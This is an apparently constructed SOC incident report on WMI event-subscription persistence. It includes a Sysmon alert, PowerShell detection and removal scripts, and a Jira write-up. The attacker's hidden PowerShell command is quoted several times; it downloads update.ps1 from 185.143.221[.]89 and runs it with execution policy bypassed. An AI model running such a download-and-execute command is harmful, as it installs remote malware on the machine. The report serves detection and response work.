Sysmon Alert Details
Alert ID: SYSMON-EVENT-TRIGGER-1546-7842
Alert Time: 2024-02-16 10:30:15 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 1 – Process Creation)
Rule: "WMI Event Subscription – Suspicious Command Line"
MITRE ATT&CK: T1546.003 – Event Triggered Execution: WMI Event Subscription
Alert Details:
Event ID: 1 (Process Creation) – WMI Event Subscription
Time: 10:25 EST
Host: DEV-WS-089 (Development Workstation)
User: SYSTEM (via WMI)
Process Tree:
– Parent: WmiPrvSE.exe (PID: 784)
– Process: powershell.exe (PID: 4789)
– Command Line: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1"
WMI Event Subscription Details:
– Namespace: root\subscription
– Filter: __EventFilter
– Name: "ProcessStartFilter"
– Query: "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"
– Consumer: ActiveScriptEventConsumer
– Name: "PowerShellConsumer"
– Script: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; …"
– Binding: __FilterToConsumerBinding
Detection Logic:
– WMI event subscription created to trigger when notepad.exe starts
– Triggers PowerShell download of malicious script
– WMI subscriptions rare on workstations
– Not triggered by user interaction
Additional Context:
– Subscription created at 10:20 EST
– No legitimate use of WMI event subscriptions on this host
– User had previously clicked phishing link
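The detection logic above in working form, as an added example (not the SOC's own rule): a Sysmon Event ID 1 record is flagged when a WMI host process spawns PowerShell, and the score rises with each download-and-execute token in the command line. The sample records are constructed; Get-WmiSpawnedPowerShell reads live Sysmon events when run on a host.

```powershell
# WMI consumer host processes: WmiPrvSE.exe runs CommandLineEventConsumer actions,
# scrcons.exe runs ActiveScriptEventConsumer scripts.
$WmiHosts = 'WmiPrvSE.exe', 'scrcons.exe'
$SuspiciousTokens = '-WindowStyle Hidden', '-ExecutionPolicy Bypass', 'Invoke-WebRequest', 'DownloadString', 'http://'

# Evaluate one process-creation record (needs ParentImage, Image, CommandLine).
function Test-WmiSpawnedPowerShell {
    param([Parameter(Mandatory)][psobject]$Event)
    $parent = Split-Path -Leaf $Event.ParentImage
    $child  = Split-Path -Leaf $Event.Image
    if ($WmiHosts -notcontains $parent) { return $null }
    if ($child -notin 'powershell.exe', 'pwsh.exe') { return $null }
    $hits = $SuspiciousTokens | Where-Object { $Event.CommandLine -like "*$_*" }
    [pscustomobject]@{
        Parent      = $parent
        Child       = $child
        Score       = 50 + 10 * @($hits).Count   # any WMI-spawned PowerShell is worth a look; tokens raise priority
        Matched     = ($hits -join ', ')
        CommandLine = $Event.CommandLine
    }
}

# Pull live Sysmon Event ID 1 records and normalise the three fields the test needs.
function Get-WmiSpawnedPowerShell {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter | ForEach-Object {
        $d = ([xml]$_.ToXml()).Event.EventData.Data
        [pscustomobject]@{
            ParentImage = ($d | Where-Object Name -eq 'ParentImage').'#text'
            Image       = ($d | Where-Object Name -eq 'Image').'#text'
            CommandLine = ($d | Where-Object Name -eq 'CommandLine').'#text'
        }
    } | ForEach-Object { Test-WmiSpawnedPowerShell $_ } | Where-Object { $_ }
}

# Constructed sample records: the alert above and a benign comparison.
$samples = @(
    [pscustomobject]@{
        ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1"'
    }
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell -File C:\build\deploy.ps1'
    }
)
$samples | ForEach-Object { Test-WmiSpawnedPowerShell $_ } | Where-Object { $_ } | Format-List
```

Only the first sample is flagged. Sysmon Event IDs 19, 20 and 21 record the creation of the filter, consumer and binding themselves and make a cleaner SIEM trigger than waiting for the consumer to fire.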
SOC Investigation Process
Step | Action | Tools Used | Findings
1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed WMI event subscription
2. Subscription Removal | Remove WMI subscription | PowerShell, wbemtest | WMI filter, consumer, binding removed
3. Script Analysis | Analyze update.ps1 | CrowdStrike Sandbox | Script downloads Cobalt Strike beacon
4. Host Scan | Check for other malware | CrowdStrike | No other persistence found
5. User Interview | Contact user | Teams, Phone | User clicked phishing link earlier
6. Threat Hunting | Check other hosts for same subscription | Splunk, Sysmon | No other hosts affected
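Steps 2 and 6 in PowerShell, as an added example rather than the SOC's own script: Get-WmiSubscription lists every filter-to-consumer binding in root\subscription (locally or on named hosts, which assumes WinRM for remote queries), and Remove-WmiSubscription exports the matching objects as evidence and then deletes binding, consumer and filter. The evidence path is a hypothetical default.

```powershell
$Namespace = 'root\subscription'
$ConsumerClasses = 'CommandLineEventConsumer', 'ActiveScriptEventConsumer'   # the two script-running consumer types

# Hunt (step 6): one row per __FilterToConsumerBinding with the filter's WQL and the
# consumer's payload, so a benign subscription can be told apart from persistence.
function Get-WmiSubscription {
    param([string[]]$ComputerName = $env:COMPUTERNAME)
    foreach ($hostName in $ComputerName) {
        $cim = @{ Namespace = $Namespace; ErrorAction = 'SilentlyContinue' }
        if ($hostName -ne $env:COMPUTERNAME) { $cim.ComputerName = $hostName }   # remote hosts need WinRM
        foreach ($b in Get-CimInstance @cim -ClassName __FilterToConsumerBinding) {
            $filter   = Get-CimInstance @cim -ClassName __EventFilter -Filter "Name='$($b.Filter.Name)'"
            $consumer = foreach ($cls in $ConsumerClasses) {
                Get-CimInstance @cim -ClassName $cls -Filter "Name='$($b.Consumer.Name)'"
            }
            $payload = if ($consumer.CommandLineTemplate) { $consumer.CommandLineTemplate } else { $consumer.ScriptText }
            [pscustomobject]@{
                Host = $hostName; Filter = $filter.Name; Query = $filter.Query
                Consumer = $b.Consumer.Name; ConsumerClass = $consumer.CimClass.CimClassName; Payload = $payload
            }
        }
    }
}

# Containment (step 2): preserve the evidence, then remove binding -> consumer -> filter.
# The binding goes first so the filter cannot fire the consumer mid-cleanup.
function Remove-WmiSubscription {
    param(
        [Parameter(Mandatory)][string]$FilterName,
        [Parameter(Mandatory)][string]$ConsumerName,
        [string]$EvidencePath = "$env:TEMP\wmi-$FilterName.xml"   # hypothetical evidence location
    )
    Get-WmiSubscription | Where-Object { $_.Filter -eq $FilterName -and $_.Consumer -eq $ConsumerName } |
        Export-Clixml -Path $EvidencePath
    Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding |
        Where-Object { $_.Filter.Name -eq $FilterName -and $_.Consumer.Name -eq $ConsumerName } |
        Remove-CimInstance
    foreach ($cls in $ConsumerClasses) {
        Get-CimInstance -Namespace $Namespace -ClassName $cls -Filter "Name='$ConsumerName'" -ErrorAction SilentlyContinue |
            Remove-CimInstance
    }
    Get-CimInstance -Namespace $Namespace -ClassName __EventFilter -Filter "Name='$FilterName'" | Remove-CimInstance
}

Get-WmiSubscription | Format-Table -AutoSize
# After review, the subscription from this incident would be removed with:
# Remove-WmiSubscription -FilterName 'ProcessStartFilter' -ConsumerName 'PowerShellConsumer'
```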
Jira Incident Report
Ticket: SOC-2024-085
Summary: T1546 – WMI Event Subscription for Persistence
Status: RESOLVED
Resolution: MALICIOUS – Subscription Removed
Priority: P2 – MEDIUM
Labels: T1546, event-triggered-execution, wmi, persistence, sysmon
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation via WMI).
Alert: "WMI Event Subscription – Suspicious Command Line".
Host: DEV-WS-089 (Development Department).
Time: 2024-02-16 10:30 EST.
Technique: MITRE ATT&CK T1546.003 – Event Triggered Execution: WMI Event Subscription.
2. Technical Analysis:
Attack Chain:
09:30 – User clicks phishing link
09:35 – Malicious script runs, installs WMI event subscription
09:40 – WMI subscription created
10:25 – User opens notepad.exe (unrelated)
10:25 – WMI subscription triggers PowerShell
10:25 – PowerShell downloads update.ps1 from 185.143.221[.]89
10:30 – Sysmon detects PowerShell from WmiPrvSE.exe
WMI Subscription Details:
Trigger: Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'
Action: Run PowerShell script downloading malicious payload
Persistence: Survives reboots; triggers whenever notepad runs
Script Analysis:
update.ps1 (SHA256: c3d4e5f6…)
Downloads Cobalt Strike beacon from same C2
Beacon connects to 185.143.221[.]89:443
User Activity:
User clicked phishing link earlier (fake "security update")
Downloaded and ran initial script
Was unaware of WMI subscription
3. Investigation Findings:
Timeline:
09:30 – User clicks phishing link
09:35 – Initial script runs
09:40 – WMI subscription created
10:25 – User opens notepad.exe (normal work)
10:25 – PowerShell triggers, downloads payload
10:30 – Sysmon alerts
10:32 – SOC investigates
10:35 – WMI subscription removed
Indicators of Compromise (IoCs):
WMI:
– Filter: ProcessStartFilter
– Consumer: PowerShellConsumer
– Query: SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/update.ps1
Files:
– update.ps1 (SHA256: c3d4e5f6…)
4. Containment Actions:
Immediate Actions:
Removed WMI event subscription using PowerShell.
Deleted any downloaded scripts.
Isolated host temporarily.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
Password reset.
Educated on phishing risks.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link, leading to initial compromise.
Contributing Factors:
WMI event subscriptions allowed (no restrictions).
No monitoring for WMI subscriptions (until Sysmon).
User lacked recent training.
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
WMI subscription removed.
Host cleaned.
User educated.
C2 blocked.
Technical Controls Enhanced:
Created SIEM alert for any new WMI event subscriptions.
Restricted WMI access via GPO.
Deployed PowerShell logging for WMI activities.
8. Conclusion:
An attacker used a WMI event subscription to establish persistence, triggering a PowerShell download whenever the user opened notepad.exe. Sysmon detected the anomalous process creation, enabling rapid removal before the payload could fully execute.
Closure Rationale: WMI subscription removed; host cleaned; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 11:30 EST